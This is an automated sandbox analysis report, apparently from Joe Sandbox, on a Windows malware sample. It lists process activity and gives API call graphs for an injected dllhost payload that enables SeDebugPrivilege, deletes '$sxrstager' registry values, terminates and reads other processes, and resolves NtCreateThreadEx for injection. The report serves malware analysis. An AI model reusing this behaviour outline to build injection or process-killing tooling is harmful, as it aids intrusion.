                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:32
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{6cf183fd-4345-4e83-86c3-b67edbc5a93f}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:33
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:34
                                                                                                          Start time:16:35:27
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{b21552e6-10c0-4b77-8348-e34fa993b74e}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:35
                                                                                                          Start time:16:35:28
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:36
                                                                                                          Start time:16:35:28
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:37
                                                                                                          Start time:16:35:28
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                          Imagebase:0xdc0000
                                                                                                          File size:418'304 bytes
                                                                                                          MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:38
                                                                                                          Start time:16:35:28
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                          Imagebase:0x7ff7403e0000
                                                                                                          File size:55'320 bytes
                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Target ID:39
                                                                                                          Start time:16:35:29
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{408c66d6-6f69-434f-838a-86e87b4371ae}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:40
                                                                                                          Start time:16:35:29
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\SysWOW64\dllhost.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\dllhost.exe /Processid:{205dcea9-d057-463c-a3cf-998f0b1939dc}
                                                                                                          Imagebase:0x100000
                                                                                                          File size:19'256 bytes
                                                                                                          MD5 hash:6F3C9485F8F97AC04C8E43EF4463A68C
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:41
                                                                                                          Start time:16:35:29
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Windows\System32\dllhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{a65f9779-a778-403b-96e3-bdb0de023251}
                                                                                                          Imagebase:0x7ff642ec0000
                                                                                                          File size:21'312 bytes
                                                                                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:true

                                                                                                          Target ID:42
                                                                                                          Start time:16:35:29
                                                                                                          Start date:03/12/2023
                                                                                                          Path:C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files (x86)\KgXRvhmJjxgIgVQQVihjUJYeIypQdCtPRrVbiRDWmuWnQjTqnIuoShFYxaWQcCBqnb\yApVCRtJPjQJu.exe"
                                                                                                          Imagebase:0x830000
                                                                                                          File size:140'800 bytes
                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Has exited:false

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:38.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:74.4%
                                                                                                            Total number of Nodes:43
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 227 140000231 ExitProcess 176 140001000 179 140001014 GetCurrentProcessId OpenProcess 176->179 178 140001009 ExitProcess 180 140001045 OpenProcessToken 179->180 181 1400010bd RegOpenKeyExW 179->181 182 1400010b4 CloseHandle 180->182 183 14000105b LookupPrivilegeValueW 180->183 184 1400010e7 RegDeleteValueW 181->184 185 1400010f8 SysAllocString SysAllocString CoInitializeEx 181->185 182->181 183->182 186 140001072 AdjustTokenPrivileges 183->186 184->185 187 140001241 SysFreeString SysFreeString GetProcessHeap HeapAlloc 185->187 188 14000112a CoInitializeSecurity 185->188 186->182 192 1400010ae GetLastError 186->192 205 140001368 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 187->205 190 140001173 CoCreateInstance 188->190 191 140001168 188->191 193 14000123b CoUninitialize 190->193 194 1400011a3 VariantInit 190->194 191->190 191->193 192->182 193->187 198 1400011f9 194->198 195 1400012d4 GetProcessHeap HeapFree GetProcessHeap HeapAlloc 196 140001368 13 API calls 195->196 202 140001315 196->202 197 140001280 197->195 200 1400012a0 OpenProcess 197->200 198->193 199 140001342 GetProcessHeap HeapFree 199->178 200->197 201 1400012b6 TerminateProcess CloseHandle 200->201 201->197 202->199 203 140001330 202->203 213 14000155c 203->213 206 1400014c8 GetProcessHeap HeapFree GetProcessHeap HeapFree 205->206 210 1400013f5 205->210 206->197 207 14000140a OpenProcess 208 140001427 K32EnumProcessModules 207->208 207->210 209 1400014b3 CloseHandle 208->209 208->210 209->210 210->206 210->207 210->209 211 140001459 ReadProcessMemory 210->211 212 14000147b 211->212 212->209 212->210 212->211 214 14000157b OpenProcess 213->214 215 1400015d0 213->215 214->215 216 140001593 214->216 215->202 221 1400015e4 216->221 224 140001648 GetModuleHandleA 221->224 225 140001663 GetProcAddress 224->225 226 1400015f9 224->226 225->226

                                                                                                            Callgraph

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 140001014-140001043 GetCurrentProcessId OpenProcess 1 140001045-140001059 OpenProcessToken 0->1 2 1400010bd-1400010e5 RegOpenKeyExW 0->2 3 1400010b4-1400010b7 CloseHandle 1->3 4 14000105b-140001070 LookupPrivilegeValueW 1->4 5 1400010e7-1400010f2 RegDeleteValueW 2->5 6 1400010f8-140001124 SysAllocString * 2 CoInitializeEx 2->6 3->2 4->3 7 140001072-1400010ac AdjustTokenPrivileges 4->7 5->6 8 140001241-140001282 SysFreeString * 2 GetProcessHeap HeapAlloc call 140001368 6->8 9 14000112a-140001166 CoInitializeSecurity 6->9 7->3 13 1400010ae GetLastError 7->13 17 1400012d4-140001317 GetProcessHeap HeapFree GetProcessHeap HeapAlloc call 140001368 8->17 18 140001284-140001289 8->18 11 140001173-14000119d CoCreateInstance 9->11 12 140001168-14000116d 9->12 15 14000123b CoUninitialize 11->15 16 1400011a3-1400011fb VariantInit 11->16 12->11 12->15 13->3 15->8 23 140001231-140001235 16->23 24 1400011fd-140001215 16->24 28 140001342-140001365 GetProcessHeap HeapFree 17->28 29 140001319-14000131e 17->29 18->17 19 14000128b-14000128e 18->19 22 140001290-140001299 19->22 26 1400012ca-1400012d2 22->26 27 14000129b-14000129e 22->27 23->15 24->23 34 140001217-14000122b 24->34 26->17 26->22 27->26 30 1400012a0-1400012b4 OpenProcess 27->30 29->28 32 140001320-140001323 29->32 30->26 33 1400012b6-1400012c4 TerminateProcess CloseHandle 30->33 35 140001325-14000132e 32->35 33->26 34->23 36 140001338-140001340 35->36 37 140001330-140001333 call 14000155c 35->37 36->28 36->35 37->36
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Heap$AllocFreeOpenString$CloseHandleInitializeTokenValue$AdjustCreateCurrentDeleteErrorInitInstanceLastLookupPrivilegePrivilegesSecurityTerminateUninitializeVariant
                                                                                                            • String ID: $sxrstager$$sxrsvc64$SOFTWARE$SeDebugPrivilege
                                                                                                            • API String ID: 2227612056-566595606
                                                                                                            • Opcode ID: 33545f7b093bffa7e6d6e68f596167ee68986d03797a0cce563c85867658168a
                                                                                                            • Instruction ID: 783fc730cd4673971968b08ac741f1a1a7a0f0db785b3f54083c1a857c08c9a6
                                                                                                            • Opcode Fuzzy Hash: 33545f7b093bffa7e6d6e68f596167ee68986d03797a0cce563c85867658168a
                                                                                                            • Instruction Fuzzy Hash: 60A117B2700B4586EB16CF66F8543E923A5FB8DB89F448125EF0E47AA5DF38D549C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 4084875642-0
                                                                                                            • Opcode ID: 5c9e6c8d196d291886fbe90ea79c47c3ea45cb56a21c54cb6fbac88e5fb9df12
                                                                                                            • Instruction ID: 0c4118f11d38248736db898342297cfd33e1e7ee26b5e3befa791c7e9a42177d
                                                                                                            • Opcode Fuzzy Hash: 5c9e6c8d196d291886fbe90ea79c47c3ea45cb56a21c54cb6fbac88e5fb9df12
                                                                                                            • Instruction Fuzzy Hash: 58514AB2611B818AEB66DF63B8587DA22A1F78DBC4F444025EF4A5B764DF38C545C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 57 140000231-140001011 ExitProcess
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 621844428-0
                                                                                                            • Opcode ID: 7ac854e1e7e6dbe7a1b520466d2429235592816ec396c733cc4186b22ad55d33
                                                                                                            • Instruction ID: 71e4820d4104f39f37cf17a5aebe01a9dbe568c608f41c0cf1242f6b27dbe954
                                                                                                            • Opcode Fuzzy Hash: 7ac854e1e7e6dbe7a1b520466d2429235592816ec396c733cc4186b22ad55d33
                                                                                                            • Instruction Fuzzy Hash: 84E0426350E3C10FC7038B74586419C3FB09796A50B8EC59BC385C3383C61C5409C312
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 58 140001000-140001011 call 140001014 ExitProcess
                                                                                                            APIs
                                                                                                              • Part of subcall function 0000000140001014: GetCurrentProcessId.KERNEL32 ref: 0000000140001027
                                                                                                              • Part of subcall function 0000000140001014: OpenProcess.KERNEL32 ref: 0000000140001037
                                                                                                              • Part of subcall function 0000000140001014: OpenProcessToken.ADVAPI32 ref: 0000000140001051
                                                                                                              • Part of subcall function 0000000140001014: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140001068
                                                                                                              • Part of subcall function 0000000140001014: AdjustTokenPrivileges.ADVAPI32 ref: 00000001400010A4
                                                                                                              • Part of subcall function 0000000140001014: GetLastError.KERNEL32 ref: 00000001400010AE
                                                                                                              • Part of subcall function 0000000140001014: CloseHandle.KERNEL32 ref: 00000001400010B7
                                                                                                              • Part of subcall function 0000000140001014: RegOpenKeyExW.ADVAPI32 ref: 00000001400010DD
                                                                                                              • Part of subcall function 0000000140001014: RegDeleteValueW.ADVAPI32 ref: 00000001400010F2
                                                                                                              • Part of subcall function 0000000140001014: SysAllocString.OLEAUT32 ref: 00000001400010FF
                                                                                                              • Part of subcall function 0000000140001014: SysAllocString.OLEAUT32 ref: 000000014000110F
                                                                                                              • Part of subcall function 0000000140001014: CoInitializeEx.OLE32 ref: 000000014000111C
                                                                                                              • Part of subcall function 0000000140001014: CoInitializeSecurity.OLE32 ref: 0000000140001156
                                                                                                              • Part of subcall function 0000000140001014: CoCreateInstance.OLE32 ref: 0000000140001195
                                                                                                              • Part of subcall function 0000000140001014: VariantInit.OLEAUT32 ref: 00000001400011A7
                                                                                                            • ExitProcess.KERNEL32 ref: 000000014000100B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Open$AllocInitializeStringTokenValue$AdjustCloseCreateCurrentDeleteErrorExitHandleInitInstanceLastLookupPrivilegePrivilegesSecurityVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 767316500-0
                                                                                                            • Opcode ID: 744f39d44c6e1cf923b69681ca2190275410b93513addb8cd57da560c05945df
                                                                                                            • Instruction ID: 146724fef438b737ed00828a951e49ec2c44f6708d9892ddea2fdd56566e6da4
                                                                                                            • Opcode Fuzzy Hash: 744f39d44c6e1cf923b69681ca2190275410b93513addb8cd57da560c05945df
                                                                                                            • Instruction Fuzzy Hash: 65A011B0A00280A2EA0AFBB2388A3C800200B88380F000808A30A832B3CE3C00C88220
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 61 140001648-140001661 GetModuleHandleA 62 140001663-14000166a GetProcAddress 61->62 63 140001670-140001674 61->63 62->63
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2310170418.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_140000000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: NtCreateThreadEx$ntdll.dll
                                                                                                            • API String ID: 1646373207-690569937
                                                                                                            • Opcode ID: 765a30b2bbc0babb255d7f809e438350524f6181367cf5a0d3374a3ce406139f
                                                                                                            • Instruction ID: 1f1ac530e8d7bc586301703381b49fd6cf30065bcfbc8e8d092ce1a2171d6dbf
                                                                                                            • Opcode Fuzzy Hash: 765a30b2bbc0babb255d7f809e438350524f6181367cf5a0d3374a3ce406139f
                                                                                                            • Instruction Fuzzy Hash: 5CD0E9F4612A41D1EA0BEF57FC593D512616B9C7C5F854461A70A43271DE3C859AC710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:64.2%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:56
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 107 4014fc 110 401509 107->110 127 40133e GetCurrentProcessId OpenProcess 110->127 113 401540 134 4013d1 SysAllocString SysAllocString CoInitializeEx 113->134 114 401532 RegDeleteValueW 114->113 116 401546 143 401292 GetProcessHeap HeapAlloc 116->143 118 40154b GetProcessHeap HeapAlloc 150 401081 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 118->150 120 40159d GetProcessHeap RtlFreeHeap 157 401000 RegOpenKeyExW 120->157 122 401501 ExitProcess 123 401572 123->120 124 40158c 123->124 126 40159b 123->126 163 40122b 124->163 126->120 128 401361 OpenProcessToken 127->128 129 4013cb RegOpenKeyExW 127->129 130 401372 LookupPrivilegeValueW 128->130 131 4013c4 FindCloseChangeNotification 128->131 129->113 129->114 130->131 132 401386 AdjustTokenPrivileges 130->132 131->129 132->131 133 4013b6 GetLastError 132->133 133->131 135 4014e6 134->135 136 401408 CoInitializeSecurity 134->136 139 4014e9 SysFreeString SysFreeString 135->139 137 401429 CoCreateInstance 136->137 138 40141e 136->138 140 40144d VariantInit 137->140 142 401490 CoUninitialize 137->142 138->137 138->142 139->116 140->142 142->139 144 401081 12 API calls 143->144 147 4012be 144->147 145 40130c GetProcessHeap RtlFreeHeap 145->118 146 40130a 146->145 147->145 147->146 148 4012dd OpenProcess 147->148 148->147 149 4012f0 TerminateProcess CloseHandle 148->149 149->147 151 4011fd GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 150->151 156 4010e9 150->156 151->123 152 4011fb 152->151 153 401100 OpenProcess 154 40111a K32EnumProcessModules 153->154 153->156 155 4011ea FindCloseChangeNotification 154->155 154->156 155->156 156->152 156->153 156->155 158 40106b RegDeleteKeyExW 157->158 159 40102c 157->159 158->122 160 40103e RegEnumKeyExW 159->160 161 401062 RegCloseKey 160->161 162 40102e RegDeleteKeyW 160->162 161->158 162->160 164 401240 OpenProcess 163->164 165 40128b 163->165 164->165 166 401255 164->166 165->123 171 40131f GetModuleHandleA 166->171 168 401271 169 401288 CloseHandle 168->169 170 401282 CloseHandle 168->170 169->165 170->169 172 40133b 171->172 173 40132e GetProcAddress 171->173 172->168 173->168

                                                                                                            Callgraph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            • Opacity -> Relevance
                                                                                                            • Disassembly available
                                                                                                            callgraph 0 Function_00401000 1 Function_004013D1 2 Function_00401081 3 Function_00401292 3->2 4 Function_00401509 4->0 4->1 4->2 4->3 5 Function_0040122B 4->5 7 Function_0040133E 4->7 8 Function_0040131F 5->8 6 Function_004014FC 6->4

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                            • GetLastError.KERNEL32 ref: 004013B6
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004013C5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$OpenToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                            • String ID: SeDebugPrivilege
                                                                                                            • API String ID: 575374161-2896544425
                                                                                                            • Opcode ID: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                            • Instruction ID: e2a5f4244efd0fdb54eb2fb8bae3e68f4838b917bcc28da7506a6e19d6301c26
                                                                                                            • Opcode Fuzzy Hash: f0a33f7c903080f54f4a1dfe6a3c8c5db33aaa213762ad9be091dafd7757ca93
                                                                                                            • Instruction Fuzzy Hash: C101CC75901619AFE7009BA49E89BAF77BCEB04745F004435BA01F22D1D7B49E44CB68
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010A4
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010B1
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00009C40,?,?,00000000), ref: 004010BF
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 004010C6
                                                                                                            • K32EnumProcesses.KERNEL32(000003E8,00009C40,?,?,?,00000000), ref: 004010DB
                                                                                                            • OpenProcess.KERNEL32(00000410,00000000,000003E8,?,?,00000000), ref: 0040110A
                                                                                                            • K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?,?,?,00000000), ref: 00401127
                                                                                                            • ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000,?,?,00000000), ref: 0040115D
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000000), ref: 004011EB
                                                                                                            • GetProcessHeap.KERNEL32(00000000,000003E8,?,?,00000000), ref: 004011FF
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 0040120C
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00401212
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 00401219
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$AllocEnumFree$ChangeCloseFindMemoryModulesNotificationOpenProcessesRead
                                                                                                            • String ID: pD$v
                                                                                                            • API String ID: 2178662837-1969647411
                                                                                                            • Opcode ID: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
                                                                                                            • Instruction ID: da445f777c3a34a6d199b0584eba223951ce35d7d1b72319c39e632b78911c99
                                                                                                            • Opcode Fuzzy Hash: 6f488189a1a7d797b470e7b51ae5cf9387d1cdd426fc30596596fbc8e91c7bf4
                                                                                                            • Instruction Fuzzy Hash: 8A513075D00219ABDB14DFD5CE84AAFBBB8FF0D300F10446AE645BB290D7789A41CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SysAllocString.OLEAUT32($sxrsvc32), ref: 004013E7
                                                                                                            • SysAllocString.OLEAUT32(00402114), ref: 004013F1
                                                                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 004013FA
                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 00401414
                                                                                                            • CoCreateInstance.OLE32(00402098,00000000,00000001,00402088,?), ref: 0040143F
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00401451
                                                                                                            • CoUninitialize.OLE32 ref: 004014DE
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004014F0
                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004014F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                            • String ID: $sxrsvc32
                                                                                                            • API String ID: 4184240511-78464866
                                                                                                            • Opcode ID: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                            • Instruction ID: 8a654483f6148525abe5e909ff2a9399e1f522979beb927b6318c92976265d17
                                                                                                            • Opcode Fuzzy Hash: 38db96cfb1d59210e069f34f99d5ef3867f18490da2d230adee7354f9f4af0ad
                                                                                                            • Instruction Fuzzy Hash: 55415271E00218AFDB00DFA9CD899AF7BBDEF45354B100069F905FB1A0C6B5AD05CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 0040133E: GetCurrentProcessId.KERNEL32 ref: 00401348
                                                                                                              • Part of subcall function 0040133E: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00401355
                                                                                                              • Part of subcall function 0040133E: OpenProcessToken.ADVAPI32(00000000,00000028,?), ref: 00401368
                                                                                                              • Part of subcall function 0040133E: LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0040137C
                                                                                                              • Part of subcall function 0040133E: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 004013AC
                                                                                                              • Part of subcall function 0040133E: GetLastError.KERNEL32 ref: 004013B6
                                                                                                              • Part of subcall function 0040133E: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004013C5
                                                                                                            • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE,00000000,000F023F,?,?,?,?,00401501), ref: 00401528
                                                                                                            • RegDeleteValueW.KERNELBASE(?,$sxrstager,?,?,?,00401501), ref: 0040153A
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00003E80,?,?,?,?,00401501), ref: 00401552
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00401501), ref: 00401559
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401501), ref: 004015A0
                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,?,?,00401501), ref: 004015A7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.2310344196.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_400000_dllhost.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$Heap$Open$TokenValue$AdjustAllocChangeCloseCurrentDeleteErrorFindFreeLastLookupNotificationPrivilegePrivileges
